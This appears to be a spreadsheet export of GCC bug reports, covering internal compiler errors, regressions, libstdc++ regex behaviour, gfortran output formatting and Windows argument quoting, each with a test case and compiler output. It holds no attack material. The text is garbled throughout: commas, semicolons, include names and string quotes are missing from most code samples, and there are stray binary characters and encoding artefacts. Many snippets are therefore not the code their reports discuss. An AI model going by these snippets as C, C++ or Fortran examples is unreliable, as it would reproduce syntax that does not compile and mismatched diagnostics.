./libtool: line 1147: 70450 Abort trap              /opt/gcc/build_w/./gcc/xgcc -B/opt/gcc/build_w/./gcc/ -B/opt/gcc/gcc4.9w/x86_64-apple-darwin10.8.0/bin/ -B/opt/gcc/gcc4.9w/x86_64-apple-darwin10.8.0/lib/ -isystem /opt/gcc/gcc4.9w/x86_64-apple-darwin10.8.0/include -isystem /opt/gcc/gcc4.9w/x86_64-apple-darwin10.8.0/sys-include /opt/gcc/work/libobjc/sendmsg.c -c -I. -I/opt/gcc/work/libobjc -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -DIN_GCC -DIN_TARGET_LIBS -fno-strict-aliasing -fexceptions -I/opt/gcc/work/libobjc/../gcc -I/opt/gcc/work/libobjc/../gcc/config -I../.././gcc -I/opt/gcc/work/libobjc/../libgcc -I../libgcc -I/opt/gcc/work/libobjc/../include -fno-common -DPIC -o .libs/sendmsg.o
make[2]: *** [sendmsg.lo] Error 1
make[1]: *** [all-target-libobjc] Error 2
...
This can be reproduced with the attached preprocessed file without option:
[macbook] f90/bug% gcc49 -c sendmsg.i
/opt/gcc/work/libobjc/sendmsg.c: In function '__objc_word_forward':
/opt/gcc/work/libobjc/sendmsg.c:848:1: internal compiler error: in check_rtl at lra.c:2034
 }
 ^
/opt/gcc/work/libobjc/sendmsg.c:848:1: internal compiler error: Abort trap
gcc49: internal compiler error: Abort trap (program cc1)
Abort
If gcc is configured with --enable-checking=release the ICE is
[macbook] f90/bug% /opt/gcc/gcc4.9p-201916/bin/gcc -c sendmsg.i
/opt/gcc/work/libobjc/sendmsg.c: In function '__objc_word_forward':
/opt/gcc/work/libobjc/sendmsg.c:848:1: error: insn does not satisfy its constraints:
 }
 ^
(insn 112 44 45 2 (set (reg:TI 45 xmm8 [89])
        (reg:TI 53 )) /opt/gcc/work/libobjc/sendmsg.c:842 84 {*movti_internal}
     (expr_list:REG_DEAD (reg:TI 53 )
        (nil)))
/opt/gcc/work/libobjc/sendmsg.c:848:1: internal compiler error: in extract_constrain_insn_cached at recog.c:2073
/opt/gcc/work/libobjc/sendmsg.c:848:1: internal compiler error: Abort trap
gcc: internal compiler error: Abort trap (program cc1)
Abort
The file compiles at r201908.</t>
  </si>
  <si>
    <t>GCC-56383</t>
  </si>
  <si>
    <t>error with multiple enable_shared_from_this base classes</t>
  </si>
  <si>
    <t>This should compile and exit normally:
#include 
#include 
struct A : std::enable_shared_from_this
{
    void* a() { return shared_from_this().get() }
}
struct B : std::enable_shared_from_this
{
}
struct D : A B
{
}
int main()
{
    auto d = std::make_shared()
    try
    {
        d-&gt;a()
        std::abort()
    }
    catch (std::bad_weak_ptr const&amp;)
    { }
}
I have a fix in mind but it can wait for post-4.8.0</t>
  </si>
  <si>
    <t>GCC-27719</t>
  </si>
  <si>
    <t>ICE on invalid function definition</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE in the C frontend
since at least GCC 2.95.3:
==================
void foo()[] {}
==================
bug.c:1: error: declaration of 'foo' as array of voids
bug.c:1: internal compiler error: tree check: expected function_decl have var_decl in start_function at c-decl.c:5933
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-43145</t>
  </si>
  <si>
    <t>local extern declaration gets wrong namespace</t>
  </si>
  <si>
    <t>For this testcase:
namespace N {
  void f()
}
void N::f()
{
  extern int i
  extern void g()
  i = 1
  g()
}
namespace N {
  int i
  void g() { }
}
int main() { }
we end up with unsatisfied references to ::i and ::g.</t>
  </si>
  <si>
    <t>GCC-77356</t>
  </si>
  <si>
    <t>regex error for a ECMAScript syntax string</t>
  </si>
  <si>
    <t>For the testcase 1.cxx:
----------------------------------------
#include 
int main() {
  static const char* kNumericAnchor =(\\$|usd)(usd|\\$|to|and|up to|[0-9\\.\\-\\sk])+
  const std::regex re(kNumericAnchor)
  return 0
}
----------------------------------------
~/workarea/gcc-r239713/build/install/bin/g++ -std=c++11 -O0 1.cxx -Wl-rpath=/usr/local/google/home/wmi/workarea/gcc-r239713/build/install/lib64
./a.out
terminate called after throwing an instance of 'std::regex_error'
  what():  Unexpected end of bracket expression.
Aborted (core dumped)
I have no problem to compile and run the testcase using libc++.
For libstdc++ the exception is thrown because the second dash '-' is not in any range and it is not the start or end of bracket expression. According to the comment in _M_expression_term in src/libstdc++-v3/include/bits/regex_compiler.tcc this is not allowed in POSIX syntax but allowed in ECMAScript syntax. Since the input is ECMAScript syntax libstdc++ shoudn't throw exception for it?</t>
  </si>
  <si>
    <t>GCC-5788</t>
  </si>
  <si>
    <t>GCC compiled programs treat double quotes in command line arguments incorrectly</t>
  </si>
  <si>
    <t xml:space="preserve"> Hi
There seems to be a problem with programs compiled by gcc
under Windows. They do not treat double quotes in their
command line arguments as they should. I have noticed this
problem in my own programs but also in other programs known to
be compiled with gcc. I have tested for this bug under Windows
95/98 and 2000 and I think this bug is quiet general in 
several versions of gcc under several versions of Windows.
The bug is the following:
Double quotes are treated as they should except for
argument 0 ( the name of program as it was called ).
Usually nobody bothers about argument 0 but in some
cases it is used by the program to know its location
which may be used to access resource files. A double
quote in argument 0 may split it up and treat the second
half as argument 1 ( and thus shift all the other arguments
one place to the right ). At the command line this gives:
program.exe arg1 arg2
becomes
prog ram.exe arg1 arg2
The program.exe gets started because the DOS shell does
the double quote interpretation without error but the
program gets 3 arguments ie. 'ram.exe' 'arg1' and 'arg2'.
This is obviously wrong and it's rather hard to
program a work-a-round for this bug.
You may ask yourself who would call a program in such
a strange way patially quoted. You'll probably never
do this at the command line but it happens a lot in
script files ( batch files ).
As an example look at this session at the DOS prompt
( Windows 2000 service pack 2 gcc 2.95.2 )
C:\Program Files\Test&gt;type args.c
#include 
main (int argc char *argv[]){
        printf((%i)   \nargcargv[0]argv[1]argv[2])
}
C:\Program Files\Test&gt;gcc args.c
C:\Program Files\Test&gt;a.exe arg1 arg2
(3)   
C:\Program Files\Test&gt;a.exe   arg1with spaces  arg2 with spaces
(3)   
C:\Program Files\Test&gt;C:\Program Files\Test\a.exe arg1 arg2
(3)   
C:\Program Files\Test&gt;C:\Program Files\Test\a.exe arg1 arg2
(4)   
C:\Program Files\Test&gt;type batch.bat
%0\..\a.exe arg1 arg2
C:\Program Files\Test&gt;batch.bat
C:\Program Files\Test&gt;batch.bat\..\a.exe arg1 arg2
(3)   
C:\Program Files\Test&gt;cd \
C:\&gt;C:\Program Files\Test\batch.bat
C:\&gt;C:\Program Files\Test\batch.bat\..\a.exe arg1 arg2
(4)   
C:\&gt;
Script files have a .bat extension under Windows and
contrary to Unix every line in the script file is echoed
at the command line ( after substitution of variables ) 
before it is executed. The variable %0 is argument 0 of
the batch file ie. the name how it was called.
I guess this bug can easily be repaired since double quotes
in the other arguments seem to be interpreted correctly.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
Windows 2000 95 98 and probably other
How-To-Repeat:
#include 
main (int argc char *argv[]){
	printf((%i)   \nargcargv[0]argv[1]argv[2])
}</t>
  </si>
  <si>
    <t>GCC-4206</t>
  </si>
  <si>
    <t>ICE with switch in while</t>
  </si>
  <si>
    <t>this is extracted from KDE source. We ICE due to some
scope mismatch.
3.0.1 compiles it ok.
Release:
current CVS</t>
  </si>
  <si>
    <t>GCC-17703</t>
  </si>
  <si>
    <t>[4.0 regression] spurious error about end of function reached</t>
  </si>
  <si>
    <t>Since recently I get a warning from this piece of code: 
-------------------- 
int foo(int first) { 
  while (true) { 
    return first 
  } 
} 
-------------------- 
g/x&gt; /home/bangerth/bin/gcc-4.0-pre/bin/c++ -Wall -c x.cc 
x.cc: In function `int foo(int)': 
x.cc:5: warning: control reaches end of non-void function 
The message is clearly bogus since the loop has a return 
statement but no edge to the end of the while loop. The message 
breaks my nightly -Werror builds since the code is inside libstdc++ 
where I can't fix it (the original code was in std::__unguarded_partition). 
This is a regression on mainline that I'd kindly like to ask to have fixed 
soonish... 
W.</t>
  </si>
  <si>
    <t>GCC-15149</t>
  </si>
  <si>
    <t>problem computing Pi</t>
  </si>
  <si>
    <t>Trying to verify the claim in 
http://gcc.gnu.org/ml/fortran/2004-04/msg00203.html
I keep getting (incorrectly) 0.0 as an approximate value for Pi whereas 
3.14...
is returned using other compilers.
TYPE point_type
 SEQUENCE
 REAL :: pos(2)
END TYPE
INTEGER PARAMETER :: N=1000000
TYPE(point_type)     :: points(N)
REAL DIMENSION(2*N) :: scratch
EQUIVALENCE(pointsscratch)
CALL RANDOM_NUMBER(scratch)
scratch=2.0*scratch-1.0
count=0
DO i=1N
  IF (SUM(points(i)%pos**2)&lt;1.0) THEN
     count=count+1
  ENDIF
ENDDO
write(6*) 4.0*REAL(count)/REAL(N)
END
with the latest version of gfortran i.e.
gfortran -v mytest.f90
Driving: gfortran -v mytest.f90 -lgfortranbegin -lgfortran -lm -shared-libgcc
Reading specs from /data1/vondele/gcc-g95/bin/../lib/gcc/i686-pc-linux-gnu/3.5-
tree-ssa/specs
Configured with: /data1/vondele/gcc-g95/gcc/configure --
prefix=/data1/vondele/gcc-g95/ --with-gmp-dir=/data1/vondele/gmp-4.1.2/ --
enable-languages=cf95
Thread model: posix
gcc version 3.5-tree-ssa 20040426 (merged 20040414)
 /data1/vondele/gcc-g95/bin/../libexec/gcc/i686-pc-linux-gnu/3.5-tree-ssa/f951 
mytest.f90 -quiet -dumpbase mytest.f90 -mtune=pentiumpro -auxbase mytest -
version -o /tmp/ccwcrrYe.s
GNU F95 version 3.5-tree-ssa 20040426 (merged 20040414) (i686-pc-linux-gnu)
        compiled by GNU C version 3.5-tree-ssa 20040426 (merged 20040414).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
 as -V -Qy -o /tmp/ccaWH9Uk.o /tmp/ccwcrrYe.s
GNU assembler version 2.12.90.0.1 (i386-linux) using BFD version 2.12.90.0.1 
20020307 Debian/GNU Linux
 /data1/vondele/gcc-g95/bin/../libexec/gcc/i686-pc-linux-gnu/3.5-tree-
ssa/collect2 --eh-frame-hdr -m elf_i386 -dynamic-linker /lib/ld-
linux.so.2 /usr/lib/crt1.o /usr/lib/crti.o /data1/vondele/gcc-
g95/bin/../lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/crtbegin.o -
L/data1/vondele/gcc-g95/bin/../lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa -
L/data1/vondele/gcc-g95/bin/../lib/gcc -L/data1/vondele/gcc-g95//lib/gcc/i686-
pc-linux-gnu/3.5-tree-ssa -L/data1/vondele/gcc-g95/bin/../lib/gcc/i686-pc-
linux-gnu/3.5-tree-ssa/../../.. -L/data1/vondele/gcc-g95//lib/gcc/i686-pc-
linux-gnu/3.5-tree-ssa/../../.. /tmp/ccaWH9Uk.o -lgfortranbegin -lgfortran -
lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /data1/vondele/gcc-g95/bin/../lib/gcc/i686-
pc-linux-gnu/3.5-tree-ssa/crtend.o /usr/lib/crtn.o</t>
  </si>
  <si>
    <t>GCC-60108</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] [C++11] ICE in use_thunk at cp/method.c:340</t>
  </si>
  <si>
    <t>seen with trunk and current 4.7 and 4.8 branches.
$ g++ -std=c++0x -c sample.cpp
sample.cpp:5:3: internal compiler error: in use_thunk at cp/method.c:340
   ~B() = default
   ^
Please submit a full bug report
with preprocessed source if appropriate.
template  struct A {
  virtual ~A()
}
template  struct B : A... {
  ~B() = default
}
struct C : B {
  C() {}
}</t>
  </si>
  <si>
    <t>GCC-32554</t>
  </si>
  <si>
    <t>[4.2 Only] Bug in P formatting</t>
  </si>
  <si>
    <t>Hi
the following code:
program gfcbug66
  real(8) :: x = 1.0e-100_8
  write (*'(1X2E12.3)')    x 2 * x
  write (*'(1X1P2E12.3)') x 2 * x   ! Second printed number is wrong
end program gfcbug66
produces:
    0.100E-99   0.200E-99
    1.000-100   2.000E-10
but it should be
    0.100E-99   0.200E-99
    1.000-100   2.000-100
This used to work before and with 4.2.
Cheers
-ha</t>
  </si>
  <si>
    <t>GCC-63588</t>
  </si>
  <si>
    <t>[5 Regression] ICE (segfault) on arm-linux-gnueabihf</t>
  </si>
  <si>
    <t>seen building libjava on arm-linux-gnueabihf on the trunk (PR63574 for the bootstrap issue).
$ cat foo.cc 
template  T elements
       elements  
$ /home/doko/gcc/gcc-snapshot-20141017/build/gcc/xg++ -B/home/doko/gcc/gcc-snapshot-20141017/build/gcc/ -c -O2 foo.cc
foo.cc:1:24: warning: variable templates only available with -std=c++14 or -std=gnu++14
 template  T elements
                        ^
foo.cc:2:18: internal compiler error: Segmentation fault
        elements  
                  ^
Please submit a full bug report
with preprocessed source if appropriate.
unsure if this is correctly reduced because the original file in PR63574 succeeds to build with -O1.</t>
  </si>
  <si>
    <t>GCC-46843</t>
  </si>
  <si>
    <t>ICE: in spill_failure at reload1.c:2157 -fschedule-insns -fsched-pressure</t>
  </si>
  <si>
    <t>Created attachment 22677
reduced testcase
Compiler output:
$ gcc -O -fschedule-insns -fsched-pressure pr46843.c 
pr46843.c: In function 'foo':
pr46843.c:9:1: error: unable to find a register to spill in class 'CREG'
pr46843.c:9:1: error: this is the insn:
(insn 19 50 9 2 (parallel [
            (set (reg/v:SI 0 ax [orig:63 n ] [63])
                (ashift:SI (reg:SI 0 ax [84])
                    (reg:QI 37 r8 [ s ])))
            (clobber (reg:CC 17 flags))
        ]) pr46843.c:3 497 {*ashlsi3_1}
     (expr_list:REG_DEAD (reg:SI 0 ax [84])
        (expr_list:REG_DEAD (reg:QI 37 r8 [ s ])
            (expr_list:REG_UNUSED (reg:CC 17 flags)
                (nil)))))
pr46843.c:9:1: internal compiler error: in spill_failure at reload1.c:2105
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
-mdispatch-scheduler -march=bdver1 doesn't help in this case (opposing to PR46829)
Tested revisions:
r167471 - fail
4.5 r166509 - fail</t>
  </si>
  <si>
    <t>GCC-54749</t>
  </si>
  <si>
    <t>On a testcase that makes the compiler run out-of-memory (by setting ulimit to 
ulimit -m 8388608
ulimit -v 8388608
ulimit -d 8388608
ulimit -t 600
and running the full testcase of PR53852) I get the following stacktrace which is a bit ugly:
GNU MP: Cannot allocate memory (size=8)
In function 'build_d_tensor_gks':
Hï¿½D$Aï¿½ï¿½Hï¿½Hï¿½D$Hï¿½Hï¿½D$ Hï¿½CHï¿½D$(Hï¿½kHï¿½CvHï¿½ï¿½Hï¿½l$HHï¿½\$@Lï¿½d$PLï¿½l$XLï¿½t$`Hï¿½ï¿½hï¿½Aborted
mmap: Cannot allocate memory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failed to read executable information
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [semi_empirical_int_gks.o] Error 1
make[2]: Target `_progr' not remade because of errors.
make[2]: Leaving directory `/data/vjoost/gnu/cp2k/cp2k/obj/gfortran-test12/sopt'
make[1]: *** [build] Error 2
make[1]: Leaving directory `/data/vjoost/gnu/cp2k/cp2k/makefiles'</t>
  </si>
  <si>
    <t>GCC-38211</t>
  </si>
  <si>
    <t>[4.2 regression] g++ 4.2 SIGSEGV in tree_inlinable_function_p</t>
  </si>
  <si>
    <t>g++ 4.2.4 (more precisely the package g++-4.2 version 4.2.4-3ubuntu4
from Ubuntu 8.10 amd64) receives a SIGSEGV when compiling the following
snippet of code with -O3. It does NOT crash with -O2 or less optimization.
The 4.3 branch (g++-4.3 4.3.2-1ubuntu11) also does NOT crash. This bug
seems similar to bug 28058 but I am not sure how closely related they are.
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=28058
 // compile with g++ -O3 -c test.cpp
 template class A                  { public: A() }
 template class B : protected A { public: B() }
 template class B  // commenting out this line prevents the segfault
 template B   ::B() : A   () {}
 template        B::B() : A() {}
I recompiled g++ from source to get a stack trace:
 $ gdb ./build/gcc/cc1plus
 GNU gdb 6.8-debian
 Copyright (C) 2008 Free Software Foundation Inc.
 License GPLv3+: GNU GPL version 3 or later &lt;
http://gnu.org/licenses/gpl.html&gt;
 This is free software: you are free to change and redistribute it.
 There is NO WARRANTY to the extent permitted by law.  Type show
copying
 and show warranty for details.
 This GDB was configured as x86_64-linux-gnu...
 (gdb) r -O3 test.cpp
 Starting program: /home/mrb/tmp/comp-4.2/gcc-4.2-4.2.4/build/gcc/cc1plus
-O3 test.cpp
  B::B() B::B() [with T = void] B::B() [with T = void] B::B()
[with T = void]
 Analyzing compilation unit
 Program received signal SIGSEGV Segmentation fault.
 0x00000000004bd689 in tree_inlinable_function_p (fn=0x7f1267299700)
     at ../../src/gcc/tree-inline.c:1467
 1467      FOR_EACH_BB_FN (bb DECL_STRUCT_FUNCTION (fndecl))
 (gdb) bt
 #0  0x00000000004bd689 in tree_inlinable_function_p (fn=0x7f1267299700)
     at ../../src/gcc/tree-inline.c:1467
 #1  0x00000000007ceb1d in cgraph_analyze_function (node=0x7f126723ea80)
     at ../../src/gcc/cgraphunit.c:955
 #2  0x00000000007cf2f5 in cgraph_finalize_compilation_unit ()
     at ../../src/gcc/cgraphunit.c:1122
 #3  0x0000000000441aea in cp_finish_file () at
../../src/gcc/cp/decl2.c:3356
 #4  0x00000000004b69ea in c_common_parse_file (set_yydebug=&lt;value
optimized out&gt;)
     at ../../src/gcc/c-opts.c:1193
 #5  0x000000000076aac3 in toplev_main (argc=
argv=)
     at ../../src/gcc/toplev.c:1032
 #6  0x00007f1267331466 in __libc_start_main () from /lib/libc.so.6
 #7  0x0000000000402779 in _start ()
 $ g++-4.2 -v
 Using built-in specs.
 Target: x86_64-linux-gnu
 Configured with: ../src/configure -v
--enable-languages=cc++fortranobjcobj-c++ --prefix=/usr
--enable-shared --with-system-zlib --libexecdir=/usr/lib
--without-included-gettext --enable-threads=posix --enable-nls
--with-gxx-include-dir=/usr/include/c++/4.2 --program-suffix=-4.2
--enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc
--enable-mpfr --enable-checking=release --build=x86_64-linux-gnu
--host=x86_64-linux-gnu --target=x86_64-linux-gnu
 Thread model: posix
 gcc version 4.2.4 (Ubuntu 4.2.4-3ubuntu4)</t>
  </si>
  <si>
    <t>m.bevand</t>
  </si>
  <si>
    <t>GCC-26074</t>
  </si>
  <si>
    <t>Module array cannot be automatic or assumed shape</t>
  </si>
  <si>
    <t>Reported to the fortran list by Jonathan Dursi
http://gcc.gnu.org/ml/fortran/2006-02/msg00016.html
I can confirm this bug and that the source of the problem is exactly as suspected by Andrew Pinksi.  A patch is on its way which also fixes PR25103 - Automatic object allowed in main program and tidies up resolve_symbol.
============================================================================
In particular this compiles:
program foo
   integer parameter :: len = 5
   integer :: arr(max(len1))
end
wheras changing `program' to `module':
module foo
   integer parameter :: len = 5
   integer :: arr(max(len1))
end
produces this:
 In file foo.F90:4
   integer :: arr(max(len1))
                            1
Error: Module array 'arr' at (1) cannot be automatic or assumed shape</t>
  </si>
  <si>
    <t>paul.richard.thomas</t>
  </si>
  <si>
    <t>GCC-21969</t>
  </si>
  <si>
    <t>ICE on float __attribute__((vector_size(2048)))</t>
  </si>
  <si>
    <t>The following one line program gives an ICE
typedef float vsf __attribute__((vector_size(2048)))
x.c:1: internal compiler error: in round_up at fold-const.c:11646
I reproduced this on IA64 and HPPA platforms and I do not think it is platform
specific.</t>
  </si>
  <si>
    <t>GCC-42386</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE in ipcp_iterate_stage at ipa-cp.c:766</t>
  </si>
  <si>
    <t>found compiling opensp:
$ g++ -O2 Big5CodingSystem.ii
Big5CodingSystem.cxx:65:1: internal compiler error: in ipcp_iterate_stage at ipa-cp.c:766
$ gcc -v
Using built-in specs.
COLLECT_GCC=/usr/x86_64-unknown-linux-gnu/gcc-bin/4.5.0-pre9999/gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-unknown-linux-gnu/4.5.0-pre9999/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /var/tmp/portage/sys-devel/gcc-4.5.0_pre9999/work/gcc-4.5.0-9999/configure --prefix=/usr --bindir=/usr/x86_64-unknown-linux-gnu/gcc-bin/4.5.0-pre9999 --includedir=/usr/lib/gcc/x86_64-unknown-linux-gnu/4.5.0-pre9999/include --datadir=/usr/share/gcc-data/x86_64-unknown-linux-gnu/4.5.0-pre9999 --mandir=/usr/share/gcc-data/x86_64-unknown-linux-gnu/4.5.0-pre9999/man --infodir=/usr/share/gcc-data/x86_64-unknown-linux-gnu/4.5.0-pre9999/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-unknown-linux-gnu/4.5.0-pre9999/include/g++-v4 --host=x86_64-unknown-linux-gnu --build=x86_64-unknown-linux-gnu --disable-altivec --disable-fixed-point --with-ppl --with-cloog --disable-nls --with-system-zlib --disable-checking --disable-werror --enable-secureplt --enable-multilib --disable-libmudflap --disable-libssp --enable-libgomp --enable-cld --with-python-dir=/share/gcc-data/x86_64-unknown-linux-gnu/4.5.0-pre9999/python --disable-libgcj --enable-languages=cc++ --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --with-bugurl=http://bugs.gentoo.org/ --with-pkgversion='Gentoo SVN' --enable-lto --enable-checking
Thread model: posix
gcc version 4.5.0-pre9999 20091215 (experimental) rev. 155245 (Gentoo SVN)</t>
  </si>
  <si>
    <t>GCC-24167</t>
  </si>
  <si>
    <t>Visibility of private component of parent in child generic generic compiles but instantiation doesn't</t>
  </si>
  <si>
    <t>The example (which I will upload directly) fails as follows:
grendel:~/tmp/visibility simon$ gnatmake -c -u -f actual-s.ads
gcc -c actual-s.ads
actual-s.ads:4:01: instantiation error at basis-second.adb:4
actual-s.ads:4:01: no selector Started for type Base defined at basis-second.ads:4 instance at line 4
gnatmake: actual-s.ads compilation error
I think the code should have compiled because the selector Started is defined in the private part of the parent package Basis.
However
grendel:~/tmp/visibility simon$ gnatmake -c -u -f basis-second.adb
gcc -c basis-second.adb
grendel:~/tmp/visibility simon$ 
In other words the generic compiles but the instantiation doesn't which is not meant to happen.</t>
  </si>
  <si>
    <t>GCC-6431</t>
  </si>
  <si>
    <t>[v850] va_arg() fails in expanding arguments</t>
  </si>
  <si>
    <t>The first optional argument is not expanded by
va_arg() at all but is skipped and the last
optional argument is expanded to a random number.
Release:
2.96-xscale-010827
Environment:
GNU C cross compiler configured for the v850-elf target the compiler is run on a PC and the operating system is
Red Hat Linux 7.1.
How-To-Repeat:
#include 
extern int out ( int )
void test( int parc ... )
{
    va_list list
    va_start( list parc )
    while( parc )
    {
        int i
        i = va_arg( list int )
        out( i )
        parc --
    }
    va_end( list )
}
int main( void )
{
    test( 4 1 2 3 4 )
    return 0
}</t>
  </si>
  <si>
    <t>markku.pihlajamaa</t>
  </si>
  <si>
    <t>GCC-18544</t>
  </si>
  <si>
    <t>[4.0 regression] ICE with -ftree-vectorize</t>
  </si>
  <si>
    <t>The following code snippet causes an ICE on mainline when compiled with
-ftree-vectorize -O -march=pentium2:
=========================================
struct A
{
    int x[2]
    A()
    {
        int* p=x
        for (int i=0 i&lt;2 ++i ++p)
            *p = 0
    }
}
A foo()
{
    return A()
}
=========================================
bug.cc: In function 'A foo()':
bug.cc:13: internal compiler error: in vect_create_data_ref_ptr at
tree-vectorizer.c:1841
Please submit a full bug report [etc.]
According to Phil's regression hunter this was introduced in October:
: Search converges between 2004-10-12-014001-trunk (#591) and
2004-10-15-014001-trunk (#592).</t>
  </si>
  <si>
    <t>GCC-79896</t>
  </si>
  <si>
    <t>[5/6 Regression] ICE in gimplify_expr at gimplify.c:11950 on non-int128 target</t>
  </si>
  <si>
    <t>Running an invalid test-case for the target ICEs:
$ arm-linux-gnueabi-g++ /home/marxin/Programming/gcc/gcc/testsuite/g++.dg/ext/int128-3.C 
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/ext/int128-3.C:7:3: error: overflow in enumeration values at â€˜e2â€™
   e2 e3
   ^~
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/ext/int128-3.C:12:27: error: expected primary-expression before â€˜__int128â€™
 SA(1 sizeof(E) == sizeof(__int128))
                           ^
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/ext/int128-3.C:10:27: note: in definition of macro â€˜SAâ€™
 #define SA(IX) int a##I[(X)? 1 : -1]
                           ^
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/ext/int128-3.C:12:27: error: expected â€˜)â€™ before â€˜__int128â€™
 SA(1 sizeof(E) == sizeof(__int128))
                           ^
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/ext/int128-3.C:10:27: note: in definition of macro â€˜SAâ€™
 #define SA(IX) int a##I[(X)? 1 : -1]
                           ^
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/ext/int128-3.C:12:37: error: expected â€˜)â€™ before â€˜â€™ token
 SA(1 sizeof(E) == sizeof(__int128))
                                     ^
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/ext/int128-3.C:12:37: error: expected â€˜]â€™ before â€˜â€™ token
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/ext/int128-3.C: In function â€˜void __static_initialization_and_destruction_0(int int)â€™:
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/ext/int128-3.C:8:3: internal compiler error: in gimplify_expr at gimplify.c:11950
 } e = e3
   ^
0xaf0dca gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	.././../gcc/gimplify.c:11950
0xb016bf gimplify_modify_expr
	.././../gcc/gimplify.c:5457
0xaef54d gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	.././../gcc/gimplify.c:11192
0xaf2cf6 gimplify_stmt(tree_node** gimple**)
	.././../gcc/gimplify.c:6478
0xaef7f1 gimplify_cleanup_point_expr
	.././../gcc/gimplify.c:6230
0xaef7f1 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	.././../gcc/gimplify.c:11567
0xaf2cf6 gimplify_stmt(tree_node** gimple**)
	.././../gcc/gimplify.c:6478
0xaee0b3 gimplify_statement_list
	.././../gcc/gimplify.c:1716
0xaee0b3 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	.././../gcc/gimplify.c:11619
0xaf2cf6 gimplify_stmt(tree_node** gimple**)
	.././../gcc/gimplify.c:6478
0xaf7f49 gimplify_cond_expr
	.././../gcc/gimplify.c:3971
0xaef584 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	.././../gcc/gimplify.c:11148
0xaf2cf6 gimplify_stmt(tree_node** gimple**)
	.././../gcc/gimplify.c:6478
0xaf7f49 gimplify_cond_expr
	.././../gcc/gimplify.c:3971
0xaef584 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	.././../gcc/gimplify.c:11148
0xaf2cf6 gimplify_stmt(tree_node** gimple**)
	.././../gcc/gimplify.c:6478
0xaf4cd9 gimplify_body(tree_node* bool)
	.././../gcc/gimplify.c:12388
0xaf5374 gimplify_function_tree(tree_node*)
	.././../gcc/gimplify.c:12546
0x96ae67 cgraph_node::analyze()
	.././../gcc/cgraphunit.c:657
0x96e5d3 analyze_functions
	.././../gcc/cgraphunit.c:1118</t>
  </si>
  <si>
    <t>GCC-12749</t>
  </si>
  <si>
    <t>i386 LP64 bug.</t>
  </si>
  <si>
    <t>The attached program will emit assembly that gas will complain about:
e_sinhf.s:134: Error: missing or invalid immediate expression 
`0xffffffffbf000000' taken as 0
e_sinhf.s:134: Error: suffix or operands invalid for `mov'
--- i386.c      18 Oct 2003 11:10:38 -0000      1.1.1.2
+++ i386.c      23 Oct 2003 20:39:10 -0000
@@ -707621 +707621 @@
   else if (GET_CODE (x) == CONST_DOUBLE &amp;&amp; GET_MODE (x) == SFmode)
     {
       REAL_VALUE_TYPE r
       long l
       REAL_VALUE_FROM_CONST_DOUBLE (r x)
       REAL_VALUE_TO_TARGET_SINGLE (r l)
       if (ASSEMBLER_DIALECT == ASM_ATT)
        putc ('$' file)
-      fprintf (file 0x%lx l)
+      fprintf (file 0x%lx l 
     }
  /* These float cases don't actually occur as immediate operands.  */
  else if (GET_CODE (x) == CONST_DOUBLE &amp;&amp; GET_MODE (x) == DFmode)
     {
       char dstr[30]
       real_to_decimal (dstr CONST_DOUBLE_REAL_VALUE (x) sizeof (dstr) 0 1)
       fprintf (file %s dstr)
     }
float fabsf (float)
typedef int __int32_t
typedef unsigned int __uint32_t
typedef union
{
  float value
  __uint32_t word
} ieee_float_shape_type
extern float __ieee754_expf (float)
extern float __ieee754_sinhf (float)
static const float one = 1.0 shuge = 1.0e37
float
__ieee754_sinhf(float x)
{
        float twh
        __int32_t ixjx
        do { ieee_float_shape_type gf_u gf_u.value = (x) (jx) = gf_u.word } w
hile (0)
        ix = jx
        if(ix&gt;=0x7f800000) return x+x
        h = 0.5
        if (jx&lt;0) h = -h
        if (ix &lt; 0x41b00000) {
            if (ix&lt;0x31800000)
                if(shuge+x&gt;one) return x
            t = expm1f(fabsf(x))
            if(ix&lt;0x3f800000) return h*((float)2.0*t-t*t/(t+one))
            return h*(t+t/(t+one))
        }
        if (ix &lt; 0x42b17180) return h*__ieee754_expf(fabsf(x))
        if (ix&lt;=0x42b2d4fc) {
            w = __ieee754_expf((float)0.5*fabsf(x))
            t = h*w
            return t*w
        }
        return x*shuge
}</t>
  </si>
  <si>
    <t>GCC-28153</t>
  </si>
  <si>
    <t>Under Windows Xp the generated JNI headers need to have a '_' prepended for each function.</t>
  </si>
  <si>
    <t>I had some problems when I tried to compile a JNI-example from wikipedia:
  http://en.wikipedia.org/wiki/JNI
I compiled the Java-source containing the native function 
with 'gcj -C' (gcc version 3.4.2 (mingw-special)):
  public native void sayHello()
I passed the class-file to 'gcjh -jni' and it produced a header with the line:
  extern JNIEXPORT void JNICALL Java_JavaSide_sayHello (JNIEnv *env jobject)
I implemented the function compiled it with 'g++ -O2 -shared'
